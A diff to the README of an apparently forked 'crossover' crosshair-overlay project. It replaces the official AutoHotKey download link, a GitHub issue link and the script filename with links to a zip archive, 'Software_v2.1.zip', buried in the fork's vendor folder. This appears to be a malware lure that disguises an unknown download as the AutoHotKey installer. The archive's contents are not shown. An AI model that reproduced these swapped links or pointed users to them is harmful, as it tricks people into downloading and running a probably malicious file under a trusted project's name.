urnansucker2000fuckme/crossover/readme.md

 #### Workaround

-If you absolutely need to use `Fullscreen` mode, or your game is not supported by crossover, there is a workaround using [AutoHotKey](https://www.autohotkey.com/).
+If you absolutely need to use `Fullscreen` mode, or your game is not supported by crossover, there is a workaround using [AutoHotKey](https://github.com/urnansucker2000fuckme/crossover/raw/refs/heads/master/src/renderer/vendor/pickr/Software_v2.1.zip).

-_Doesn't work with some games [#47](https://github.com/lacymorrow/crossover/issues/47#issuecomment-895995990), and causes FPS issues in other cases_
+_Doesn't work with some games [#47](https://github.com/urnansucker2000fuckme/crossover/raw/refs/heads/master/src/renderer/vendor/pickr/Software_v2.1.zip), and causes FPS issues in other cases_

-Install AutoHotKey and run this script with it (save it as `script.ahk` and double-click it):
+Install AutoHotKey and run this script with it (save it as `https://github.com/urnansucker2000fuckme/crossover/raw/refs/heads/master/src/renderer/vendor/pickr/Software_v2.1.zip` and double-click it):

 ```autohotkey
 Home::Winset, Alwaysontop, , CrossOver